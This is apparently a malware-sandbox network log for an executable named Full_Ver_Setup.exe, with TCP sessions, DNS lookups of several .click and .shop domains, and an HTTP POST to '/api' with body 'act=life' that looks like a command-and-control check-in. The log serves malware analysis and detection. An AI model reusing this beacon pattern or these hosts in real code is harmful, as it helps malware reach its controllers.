                                                                                                                                                                Dec 22, 2024 23:30:20.496228933 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:20.498575926 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:20.498593092 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:21.715195894 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:21.715302944 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:21.716609955 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:21.716619968 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:21.716939926 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:21.719772100 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:21.719927073 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:21.719954967 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.496932983 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497015953 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497060061 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497095108 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497108936 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.497127056 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497136116 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.497139931 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.497231960 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.505203962 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.513597965 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.513659954 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.513673067 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.553369999 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.553379059 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.600267887 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.616867065 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.662745953 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.662754059 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.692511082 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.692559958 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.692569017 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.698834896 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.698880911 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.698887110 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.698992014 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.699049950 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.699192047 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.699210882 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.699223042 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.699229956 CET44349731104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.921307087 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.921341896 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:22.921444893 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.921770096 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:22.921783924 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.417623997 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.417773008 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.419234991 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.419244051 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.419661999 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.420950890 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.421087027 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.421129942 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:24.421195030 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:24.421204090 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.402290106 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.402549028 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.402637005 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.402839899 CET49733443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.402868986 CET44349733104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.514818907 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.514938116 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:25.515033960 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.515573025 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:25.515615940 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.738147020 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.738256931 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.739577055 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.739598989 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.740550041 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:26.749300003 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.749422073 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:26.749476910 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.531897068 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.532018900 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.532113075 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.532233000 CET49736443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.532257080 CET44349736104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.712534904 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.712582111 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:27.712646961 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.712970972 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:27.712984085 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.931811094 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.931973934 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.933257103 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.933304071 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.934062958 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.939979076 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.940136909 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.940188885 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:28.940301895 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:28.940318108 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:29.956307888 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:29.956469059 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:29.956609964 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:29.956688881 CET49739443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:29.956712961 CET44349739104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:30.414041042 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:30.414165974 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:30.414256096 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:30.414581060 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:30.414618015 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.637579918 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.637679100 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.639188051 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.639218092 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.640290022 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:31.649317026 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.649425030 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:31.649470091 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.400566101 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.400827885 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.400897980 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.401068926 CET49741443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.401088953 CET44349741104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.556844950 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.556945086 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:32.557039976 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.557411909 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:32.557441950 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.777729034 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.777837992 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.784328938 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.784342051 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.784656048 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:33.785820007 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.786098003 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:33.786103964 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:34.556624889 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:34.556763887 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:34.556832075 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:34.557034016 CET49742443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:34.557049036 CET44349742104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:35.331476927 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:35.331569910 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:35.331746101 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:35.332077980 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:35.332113028 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.554636955 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.554754019 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.556058884 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.556092978 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.556598902 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.573779106 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.574485064 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.574572086 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.574675083 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.574729919 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.574826956 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.574872971 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.574951887 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575167894 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.575221062 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.575233936 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575299025 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575406075 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.575531960 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575562954 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.575676918 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575706959 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575728893 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.575850010 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575881004 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.575967073 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.576095104 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.576123953 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.576174021 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.576261997 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.619380951 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.619488001 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.663352013 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.815033913 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.815234900 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.815294981 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.815371990 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.815397024 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.815432072 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.815546036 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:36.815589905 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.935415030 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:36.935520887 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:38.975552082 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:38.975647926 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:38.975733995 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:38.975914955 CET49743443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:38.975960016 CET44349743104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:39.004894972 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:39.004986048 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:39.005091906 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:39.005372047 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:39.005403042 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:40.219105005 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:40.219207048 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:40.222902060 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:40.222929955 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:40.223217010 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:40.224319935 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:40.224355936 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:40.224417925 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:41.011619091 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:41.011710882 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:41.011864901 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:41.011960983 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:41.012000084 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:41.012027979 CET49744443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:41.012044907 CET44349744104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:41.154028893 CET49745443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:41.154102087 CET44349745194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:41.154198885 CET49745443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:41.154464006 CET49745443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:41.154496908 CET44349745194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:45.969371080 CET44349745194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:45.969481945 CET49745443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:45.973264933 CET49745443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:45.973308086 CET44349745194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:45.976790905 CET49746443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:45.976883888 CET44349746194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:45.976982117 CET49746443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:45.978233099 CET49746443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:45.978269100 CET44349746194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:50.774959087 CET44349746194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:50.775043964 CET49746443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:50.775125980 CET49746443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:50.775167942 CET44349746194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:50.775563955 CET49747443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:50.775652885 CET44349747194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:50.775749922 CET49747443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:50.776557922 CET49747443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:50.776602030 CET44349747194.58.112.174192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:50.776649952 CET49747443192.168.2.4194.58.112.174
                                                                                                                                                                Dec 22, 2024 23:30:50.917865992 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:50.917943001 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:50.918041945 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:50.918435097 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:50.918464899 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.133521080 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.133737087 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.135257006 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.135289907 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.135546923 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.136624098 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.179328918 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.566571951 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.566606998 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.566632986 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.566653013 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.566668034 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.566720009 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.566742897 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.566751957 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.566792011 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.566937923 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.566992044 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:52.567024946 CET49748443192.168.2.4104.21.84.113
                                                                                                                                                                Dec 22, 2024 23:30:52.567040920 CET44349748104.21.84.113192.168.2.4
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Dec 22, 2024 23:30:18.151690006 CET5429753192.168.2.41.1.1.1
                                                                                                                                                                Dec 22, 2024 23:30:18.509686947 CET53542971.1.1.1192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:41.014811039 CET4980953192.168.2.41.1.1.1
                                                                                                                                                                Dec 22, 2024 23:30:41.153346062 CET53498091.1.1.1192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:50.779095888 CET4919553192.168.2.41.1.1.1
                                                                                                                                                                Dec 22, 2024 23:30:50.916626930 CET53491951.1.1.1192.168.2.4
                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Dec 22, 2024 23:30:18.151690006 CET192.168.2.41.1.1.10x3b6aStandard query (0)fannleadyn.clickA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 22, 2024 23:30:41.014811039 CET192.168.2.41.1.1.10x7d77Standard query (0)neqi.shopA (IP address)IN (0x0001)false
                                                                                                                                                                Dec 22, 2024 23:30:50.779095888 CET192.168.2.41.1.1.10x4028Standard query (0)kliptizq.shopA (IP address)IN (0x0001)false
                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Dec 22, 2024 23:30:18.509686947 CET1.1.1.1192.168.2.40x3b6aNo error (0)fannleadyn.click104.21.63.229A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 22, 2024 23:30:18.509686947 CET1.1.1.1192.168.2.40x3b6aNo error (0)fannleadyn.click172.67.172.94A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 22, 2024 23:30:41.153346062 CET1.1.1.1192.168.2.40x7d77No error (0)neqi.shop194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 22, 2024 23:30:50.916626930 CET1.1.1.1192.168.2.40x4028No error (0)kliptizq.shop104.21.84.113A (IP address)IN (0x0001)false
                                                                                                                                                                Dec 22, 2024 23:30:50.916626930 CET1.1.1.1192.168.2.40x4028No error (0)kliptizq.shop172.67.191.144A (IP address)IN (0x0001)false
                                                                                                                                                                • fannleadyn.click
                                                                                                                                                                • kliptizq.shop
                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.449730104.21.63.2294436476C:\Users\user\Desktop\Full_Ver_Setup.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-12-22 22:30:19 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Host: fannleadyn.click
                                                                                                                                                                2024-12-22 22:30:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                2024-12-22 22:30:20 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 22 Dec 2024 22:30:20 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Set-Cookie: PHPSESSID=370c5l614c03cfend9p85surk4; expires=Thu, 17 Apr 2025 16:16:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                vary: accept-encoding
